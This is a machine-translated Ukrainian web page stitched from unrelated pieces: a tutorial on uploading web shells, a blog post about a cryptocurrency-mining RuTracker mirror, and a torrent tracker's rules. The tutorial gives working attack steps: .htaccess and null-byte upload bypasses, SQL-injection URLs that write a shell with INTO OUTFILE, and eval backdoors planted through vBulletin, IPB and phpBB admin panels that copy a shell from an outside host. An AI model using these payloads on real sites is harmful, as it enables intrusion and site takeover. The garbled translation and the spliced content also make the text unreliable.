Наділити profile php mode. Способи заливки шелла

Привіт% username% і його друзі. Ну ось потрібно терміново залити шелл на сайт, ну хіба мало, може кінцевий гонорар від цього залежить. Ну а ніяк не виходить. Ось зібрав пару прикладів (спасибі tracy і іншим за це).

Ллємо шелл через картинку

Ви зламали сайт (зрозуміло тільки тестируете) з самопісний адмінкой ... І не можете залитий веб-шелл, але там присутня заливка картинок і завантажує тільки формати.jpg, .gif, .png.
Що в цьому випадком можна зробити?

Пхає шелл з расшіреніем.gif в якусь папку з картинками, і створюємо файл.htaccess з вмістом

AddType application / x-httpd-php .gif
Дана команда виконає формат.gif як php
Пробуємо відкрити /shell.gif

Так само, якщо скрипт не байдужий до переносу рядка, пробуємо залити шелл попутно перейменувавши його в shell.php% 00.jpg, Перевіряти доступність shell.php, а раптом?

Спосіб заливки шелла через mysql.user з скули

1) Дізнаємося з під кого ми сидимо і дізнаємося так само його права до mysql.

site.com/index.php?id\u003d1+and+1\u003d0+union+Select+1,user(),3+--+
(Дізнаємося під ким ми сидимо)
2) site.com/index.php?id\u003d1+and+1\u003d0+union+Select+1,file_priv,3+from+mysql.user+where+user\u003d " наш юзер "+--+
(Перевіримо привілеї нашого користувача. Якщо видає помилку при виведенні, можна похексіть нашого юзера 0x)
3) site.com/index.php?id\u003d-1+union+select+1,"",3+from+mysql.user+into+outfile+ " Шлях до файлу "+--+
(Заливаємо міні-шелл)
P.S
Що б все вийшло потрібно имееть права на запис і знати повний шлях до кореня.
Так само перевірити права на запис можна так:

site.com/index.php?id\u003d1+and+1\u003d0+union+Select+1, " prava ", 3 + from + mysql.user + - +
Якщо prava відобразиться, то права є.

Наступна ситуація. Ми в адмінці форумного движка vBulletin

заходимо:
Plugins & Products -\u003e Plugin Manager -\u003e Модулі & Продукти -\u003e Менеджер плагінів -\u003e [Додати новий плагін]

Вибираємо темптлей. Зазвичай вибирають faq_complete, вибираємо і тиснемо галочку Plugin is Active виставляємо «Yes» і зберігаємо.

localhost / forum / faq.php? cmd \u003d phpinfo ();

Якщо ми вивели phpinfo () то вважайте шелл у нас в руках.

Далі в phpinfo потрібно знайти повний шлях до форуму (Наприклад /home/u0000/site.ru/www/sell.php). Далі нам потрібно наш веб-шелл перетворити в txt файл і залити на будь-який сайт
mysite.com/shell.txt
Шелл заливаємо командою

localhost / forum / faq.php? cmd \u003d copy ($ _ GET [a], $ _ GET [b]); & a \u003d mysite.com / shell.txt & b \u003d / home / u0000 / site.ru / www / sell.php
Що робить ця команда? Вона копіює вміст змінної [a] в змінну [b], тобто shell.txt копіює в shell.php

Заливаємо шелл в IPB 3

заходимо:
Поддержка-\u003e Управління SQL-\u003e виконувати процеси-\u003e Виконати новий запит

код:
select 0x3c3f706870696e666f28293b3f3e into outfile "Z: /home/site.ru/www/uploads/shell.php"
Повний шлях можна подивитися так:

Адмінка-\u003e Підтримка
Там буде зверху написана версія PHP і зліва посилання на PHPINFO

Шелл тут:
http://site.com/uploads/shell.php

Заливаємо шелл в phpBB 2

1. Створюємо файл ex.sql
2. Прописуємо туди

UPDATE phpbb_users SET user_sig_bbcode_uid \u003d "(. +) / E \\ 0", user_sig \u003d "phpbb: eval (stripslashes ($ _ GET [e]));" WHERE user_id \u003d 2;
Де user_id \u003d 2 - ідентифікатор адміністратора

3. Заходимо в адмін-панель
4. У адмін-панелі обираємо пункт «Відновити БД» і завантажуємо ex.sql
5. Виконуємо код / \u200b\u200bЗаливаємо шелл так

заходимо:
http: //target/profile.php? mode \u003d editprofile & e \u003d phpinfo ();
після:
http: //target/profile.php? mode \u003d editprofile & e \u003d faq.php? cmd \u003d copy ($ _GET [a], $ _ GET [b]); & a \u003d mysite.com / shell.txt & b \u003d / home / u0000 / site.ru/www/sell.php
Що б вивести phpinfo () потрібно бути авторизованим.

Це тільки коротенький список, як і на будь движки можна залити шелл. Треба більше? Welcome до хлопців на rdot
заливка на форуми
заливка на cms
А ось і мій улюблений шелл, теж на rdot))

Я писав про те, що при спробі залогінитися на одному з дзеркал RuTracker, видається повідомлення про те, що це можливо лише за тієї умови, якщо ви дозволите сайту виконувати обчислення на вашому комп'ютері, іншими словами - Майні криптовалюта.

Після цього, мені в коментарі посипалися гнівні повідомлення про те, що я насправді дурень, а описувані мною дзеркала не належать рутрекере і жодним чином вони не пов'язані з самим рутрекере. Я не сильно надавав цьому значення і в коментарях до тієї замітці задав питання, а як же бути з тим, що дзеркало rutracker-org.appspot.com повторює не тільки дизайн офіційного сайту рутрекера rutracker.org, Але і повністю повторює його вміст. Однак у відповідь на це я почув що, цитую: " Дурень ти Волох і нічого не розумієш".

Як і личить розсудливій людині - він починає замислюватися над наступним: якщо мені кажуть що я дурень, то може бути так воно і є? Я теж так подумав, виявилося що немає - в цій ситуації я не дурень. Але про все по порядку.

Після того, як в коментарях адміни RuTracker почали говорити про те, що:

Інших дзеркал і "дочірніх проектів" у нас немає! Всі інші "клони" рутрекера, дублюючі нашу структуру і дизайн, до нас ніякого відношення не мають, їх використання може призвести до крадіжки паролів, задіяння вашого комп'ютера для Майнінг криптовалюта і іншим неприємностей! Мейнтрекер - це також фейк !!

Я став замислюватися, може бути дійсно я погарячкував і даремно наговорюють на хлопців з RuTracker. Гаразд, я вирішив порівняти коментарі з офіційного сайту RuTracker - rutracker.org і коментарі з дзеркала рутрекера rutracker-org.appspot.com, Який запитував дозвіл на генерацію криптовалюта. Виявилося, що коментарі повністю ідентичні. Але мені ж ніхто не повірить - вирішив я, і хотів зробити скріншоти. Але і ця затія здалася дурною, тому що коментарі легко видаляються і редагуються.

Найкращою ідеєю стала запис відео. Дивимося, а потім я прокомментрірую що тут відбувається:

Подивилися? Відразу скажу, що відео виставляю "як воно є", тобто без монтажу. Тому воно без будь-яких коментарів або озвучення. Отже, давайте розберемося що тут відбувається.

Для початку я створив поштову скриньку, щоб зарегаться на сайті rutracker-org.appspot.com. Так, саме на тому сайті, який Майні криптовалюта. Чому саме на ньому, а не на офіційному сайті rutracker.org? Справа в тому, що переді мною стояло завдання показати те, що у сайтів rutracker-org.appspot.com і rutracker.org одна база даних, тобто ці сайти між собою взаємопов'язані всупереч заявам адмінів рутрекера.

Після того, як я завів пошту, я відкрив браузер Tor і завантажив три вкладки:

1. Офіційний сайт rutracker.org;

2. Дзеркало RuTracker rutracker-org.appspot.com;

3. ярлик з відкритим поштовою скринькою.

Після цього, на дзеркалі RuTracker rutracker-org.appspot.com я провів реєстрацію (Time 00:25) і в мою поштову скриньку надійшов лист з активацією облікового запису (Time 00:57). І ось тут вже починається цікаві танці, точніше моторошні танці з підгоранням п'ятої точки адмінів сайту: в коді активації вказано посилання на офіційний сайт трекера (Time 1:00):

https://rutracker.org/forum/profile.php?mode\u003dactivate&u\u003d43055955&act_key\u003dnUMiXqWX19EF

Це посилання робоча і вона веде саме на офіційній сайт rutracker.org. Перейшовши за посиланням, обліковий запис, створена на дзеркалі rutracker-org.appspot.com успішно активізувалася на офіційному сайті rutracker.org (Time 1:06). У чудеса техніки і адмінській чудо-думки. Здається у адмінів сайту починає щось диміти. Та й добре, я ж дурень як вони сказали, що з мене взяти. Йдемо далі.

Після успішної активації облікового запису, я вирушаю на дзеркало rutracker-org.appspot.com і виробляю спробу залогінитися на сайті (Time 1:45). Після введення капчі, я успішно заходжу під створеної обліковим записом на "неофіційному" трекері (Time 2:03). І в цей момент з'являється той самий повідомлення (Time 2:07):

Я натискаю на кнопку "Дозволити" (Time 2:08), так як в противному випадку я б не зміг залогінитися. Після цього, показую, що личка порожня і я ще не залишав ніяких коментарів (Time 2:20).

Тепер, для того, щоб показати взаємозв'язок дзеркала і офіційного сайту, я вибираю рандомних роздачу на сайті rutracker-org.appspot.com і залишаю коментар (Time 3:10). Після чого, на офіційному сайті rutracker.org виробляю спробу залогінитися (Time 3:40) з обліковим записом, створеної на дзеркалі рутрекера. І о диво - логін і пароль від "неофіційного" дзеркала підійшов до офіційного сайту (Time 4:00). Збіг? Не думаю.

Йдемо далі, відкриваємо список повідомлень, залишених на трекері і що ми бачимо: знайома роздача в списку тем (Time 4:05). Напевно теж збіг і для більшої переконливості відкриваю залишений мною коментар до цієї роздачі на непрізнаваемом админами дзеркалі (Time 4:17).

Порівнюємо коментар до роздачі з сайту rutracker-org.appspot.com і rutracker.org (Time 5.54) і ще раз переконуємося в тому, що ці два сайти взаємопов'язані.

А що мені писали адміни сайту? Здається вони переконували мене в тому, що офіційний сайт і дзеркало rutracker-org.appspot.com ніяк між собою не пов'язані між собою. У коментарях адмінів трекера чітко говориться про те, що всі дзеркала просто лише дублюють структуру і дизайн сайту, але не пов'язані між собою. Однак з побаченого виходить, що офіційний сайт копіює коментарі з якогось лівого дзеркала? Та ні, теж маячня. А де ж істина? Істина в тому, що у цих двох сайтів одна база даних, а дзеркал безліч, одні з яких визнаються адміністраторами трекера, а інші не визнаються і використовуються для генерації криптовалюта.

Виходить що весь цей час, мені в коментарях намагалися лити в вуха якусь ахінею і переконувати мене в тому, що я нібито зайшов зовсім на лівий сайт, а на ділі виявилося що цей сайт також належить RuTracker.

Підозрюю, що зараз у деяких людей почнеться синдром запалення п'ятої точки і посипляться погрози, образи і т.п. Але ж я вже і справді подумав, що даремно наїжджаю на хлопців і вони ні в чому не винні. Виявилося все зовсім інакше і відео тому доказ. Як сказав колега: RuTracker - ти був мені як брат.

Правила та обмеження на трекері.

1. Загальні положення та обмеження
1.1. Дані правила трекера не підлягають обговоренню і обов'язкові для виконання всіма, присутніми на трекері. Тільки Адміністраторам трекера дозволено не дотримуватися деякі положення правил у виняткових ситуаціях.
1.2. Адміністрація трекера є єдиною і вищою інстанцією, де можна вирішити будь-які конфліктні ситуації, що стосуються трекера і його користувачів. Таким чином, рішення Адміністраторів остаточні і оскарженню не підлягають.
1.3. Адміністрація трекера залишає за собою право змінювати і доповнювати всі пункти даних правил без попереднього або наступного повідомлення. Доповнення і зміни правил вступають в силу з моменту їх опублікування. Однак як акт доброї волі Адміністрація буде намагатися по можливості доводити такі зміни до відома користувачів.
1.4. Незнання цих і інших Правил трекера не тільки не звільняє від відповідальності за їх порушення, але і само по собі є порушенням і обтяжуючою вину обставиною.
1.5. Забороняється використовувати будь-які програми для фальсифікації даних про Ваш Upload "e і Download" e. Чітери моментально відправляються в бан.
1.7. Заборонено використання несправностей і помилок трекера в особистих цілях. У разі виявлення несправностей і помилок необхідно поставити Адміністрацію трекера до відома.
2. Реєстрація
Реєстрація є невід'ємною частиною присутності на трекері. Проходження реєстрації автоматично означає Вашу згоду з даними Правилами. Якщо Ви не згодні з даними Правилами, напишіть адміністрації.
2.1. ЗАБОРОНЯЄТЬСЯ РЕЄСТРАЦІЯ З РІЗНИХ ЗАКОРДОННИХ проксі-СЕРВЕРІВ. Порушникам - моментальний бан !!!
У виняткових випадках допускається тільки після розгляду заявки адміністрацією.
2.2. ЗАБОРОНЯЄТЬСЯ РЕЄСТРАЦІЯ З ОДНОГО КОМП'ЮТЕРА БІЛЬШЕ ДВОХ акаунт. При порушенні банятся всі наявні акаунти.
Реєстрація нового аккаунта, після наявних двох, можлива тільки за згодою адміністрації.
3. Правила коментування роздач
3.1. Заборонено використання ненормативної лексики в коментарях до раздачам, будь-які нецензурні слова і вирази, завуальований мат, в тому числі на іноземних мовах.
Покарання: Видалення порушують правила коментарів і заборона на написання коментарів терміном на 1 тиждень. При подальшому порушення даного правила, бан строком на 7 днів і заборона на написання коментарів терміном на 14 днів. Надалі - перманентний заборону на написання коментарів.
3.2. Забороняється ображати учасників трекера в будь-якій формі. Заборонено прояв будь-якої грубості, особистих образ і нецензурних висловів щодо інших учасників, нанесення шкоди їх репутації, принижують їх честь і гідність, в тому числі публічне з'ясування особистих стосунків, як в особистих повідомленнях на трекері, так і в коментарях до раздачам. Учасники повинні дотримуватися поважну форму спілкування.
Покарання: Видалення порушують правила коментарів і бан порушника терміном на 7 днів. При подальшому порушення даного правила, бан строком на 7 днів і заборона на написання коментарів терміном на 30 днів. Надалі - перманентний заборону на написання коментарів.
3.3. Заборонені погрози будь-якого характеру (віртуальні, реальні і інші погрози на адресу учасників трекера).
Покарання: Видалення повідомлень і бан порушника терміном на 14 днів. При повторному порушенні даного правила бан на місяць.
3.4. Заборонені флейм (повідомлення не по суті, покликані розв'язати суперечку, а також перехід на особистості обговорюють), флуд (повідомлення, які не відповідають темі, що не несуть смислового навантаження або складаються з одних тільки смайлів), оффтоп (повідомлення, що не відносяться до обговорюваної теми) , а також спонукання до флуду, флейму, Оффтоп і повідомлення типу: "Допоможіть", "Проблема", "а про що це ви, а?" або "Так я не зрозумів - звідки качати?" і їм подібні, що не відносяться до даної роздачі. В одному коментарі може бути не більше 3 смайлів.
Покарання: Видалення порушують правила коментарів і попередження автора коментаря терміном на 3 дня. При повторному порушенні даного правила автору коментаря видається заборона на написання коментарів терміном на 7 днів. Надалі при кожному порушенні видається заборона на залишення коментарів терміном на 14 днів і заборона на скачування терміном на 14 днів.
3.5. Заборонено в коментарях розміщення повідомлень комерційного характеру, прямий або непрямої реклами, спам-розсилок і посилань на сайти, безпосередньо не пов'язаних з роздачею.
Покарання: Видалення реклами, заборона на написання коментарів терміном на 7 днів і заборона на скачування терміном на 7 днів. При повторному порушенні заборона на написання коментарів терміном на 15 днів і заборона на скачування терміном на 15 днів. Надалі перманентний заборону на написання коментарів.
3.6. Заборонено в коментарях проявляти расову, національну та релігійну неприязнь, агітувати політичні партії, пропагувати тероризм, екстремізм, наркотики, релігії та інші теми, несумісні із загальноприйнятими законами моралі і пристойності.
Покарання: Видалення порушують правила коментарів, заборона на написання коментарів терміном на 14 днів і заборона на скачування терміном на 14 днів. При повторному порушенні заборона на написання коментарів терміном на 30 днів і заборона на скачування терміном на 30 днів. Надалі перманентний заборону на написання коментарів.
3.7. Заборонено залишати коментарі, явно чи приховано порушують КК РФ, а також повідомлення, що закликають до вчинення протиправних дій.
Покарання: Видалення повідомлень, заборона на написання коментарів терміном на 14 днів і заборона на скачування терміном на 14 днів. При повторному порушенні бан порушника терміном на 30 днів. При третьому порушенні - перманентний бан.
3.8. Заборонено в коментарях до раздачам розголошення будь-яких особистих даних користувачів, конфіденційних даних, справжніх П.І.Б., публікація фотографій, поширення відомостей про приватне життя учасника обговорення, складових його особисту або сімейну таємницю, без його згоди.
Покарання: Видалення порушують правила коментарів і усне попередження учасника трекера. При повторному порушенні заборона на написання коментарів терміном на 7 днів. Надалі заборона на написання коментарів терміном на 30 днів.
3.9. Заборонено викладання в коментарях зображень, що містять порнографію, сцени жорстокості або будь-які інші зображення, що принижують або ображають інших користувачів.
Покарання: Видалення порушують правила коментарів і заборона на скачування і залишення коментарів терміном на 7 днів. При повторному порушенні бан користувача строком на 7 днів. Надалі - бан строком на 15 днів і перманентний заборону на написання коментарів.
3.10. Заборонено використовувати в коментарях мову, відмінний від російського, і шрифт, відмінний від кириличного.
Покарання: Видалення повідомлень і усне попередження користувача, при повторному порушенні правил даного пункту заборона на написання коментарів терміном на 3 дня.
3.11. Заборонено використання в повідомленнях наступних способів виділення: червоного кольору, більше 75% заголовних букв і шрифту великого розміру - це привілей модераторів і адміністраторів.
Покарання: Видалення повідомлень і усне попередження користувача, при повторному порушенні правил даного пункту заборона на написання коментарів терміном на 7 днів.
3.12. Заборонено оверквотинг (цитування повідомлень інших учасників в кількостях, що перевищують розумні (більше 10 рядків оригінального повідомлення)).
Покарання: Редагування повідомлення і усне попередження користувача, при повторному порушенні правил даного пункту заборона на написання коментарів терміном на 3 дня.
3.13. Забороняється спойлер, і утримуйтеся від використання спойлерів (розкриття ключових моментів сюжету, знання яких може зіпсувати іншим враження від перегляду, результату матчу і т.д.).
Якщо ж обійтися без спойлерів не можна, то потрібно обов'язково укласти спойлер в тег [еxpand] і ставити перед ним позначку «Спойлер».
Примітка: В "спортивних" роздачах забороняється спойлер до 11 коментаря (1 сторінка).
Покарання: Редагування повідомлення і усне попередження користувача. При повторному порушенні правил даного пункту заборона на написання коментарів терміном на 3 дня.
3.14. Забороняється публікація повідомлень, що містять свідомо ложнyю інформацію.
Покарання: Видалення порушують правила коментарів і усне попередження користувача. При повторному порушенні правил даного пункту заборона на залишення коментарів терміном на 7 днів.
Система коментарів торрентів створена для того щоб:
- Висловити свою повагу і подяку роздає,
- Поставити Вас конкретне питання щодо роздачі,
- Повідомити цікаву інформацію, що відноситься до роздачі.
4. Обмеження на аватари і підписи:
4.1. підпис:
- Максимальна висота: 100 точок (іншими словами, не більше чотирьох юзербарів або десяти рядків тексту (розмір шрифту 10); ширина: 750 точок.
- Загальна вага зображень, що містяться в підпису, не повинен перевищувати 200 Kb.
- Зміст: недопустимі насильство, погрози (на демографічній, національної, релігійної або політичної основі), лихослів'я (ненормативна лексика, обзивательства, грубість і т.д.), розпуста (порнографія), дискримінація в будь-яких проявах, тексти та зображення рекламного або комерційного характеру, імітація звань / рангів цього ресурсу, а також зображення провокаційного толку, в т.ч. з використанням нацистської символіки.
- Анімація: сильно миготливі підписи заборонені (ступінь миготіння визначається адміністрацією).
- Підпис під Вашими повідомленнями не може бути використана для створення посилань на будь-які ресурси мережі. (Виключення складають посилання на сайти з юзербара, сервіси на зразок youtube, google і т.п.)
4.2. Aватара:
- Максимальний розмір: 100х100 точок; вага: до 21 Кб.
- Зміст: недопустимі насильство, погрози (на демографічній, національної, релігійної або політичної основі), лихослів'я (ненормативна лексика, обзивательства, грубість і т.д.), розпуста (порнографія), дискримінація в будь-яких проявах, пропаганда наркотиків, комерційна реклама і рекламні тексти, імітація звань / рангів цього ресурсу, що має намір схожість з аватарами членів адміністрації, а також зображення провокаційного толку, в т.ч. з використанням нацистської символіки.
- Анімація: сильно миготливі аватари заборонені (ступінь миготіння визначається адміністрацією).
Покарання: Видалення підписи і аватари, або заборона на їх використання (визначається адміністратором).
5. Релізи
5.1. Забороняється пере релізи на інші трекери без особистого дозволу релізера. Підтримка роздачі забороненого до перезаліву релізу на іншому трекері прирівнюється до самостійного перезаліву і карається у відповідність до п.7.
6. Інше
6.1. Забороняється закачування вмісту роздач з використанням файлообмінників типу vip-file, letitbit і інших ...
6.2. Забороняється використання для закачування торрента будь-яких менеджерів закачувань.
7. Покарання:
За зазначені в пп.5-6 порушення - бан на 7 днів. При повторному порушенні даних пунктів правил - довічний бан.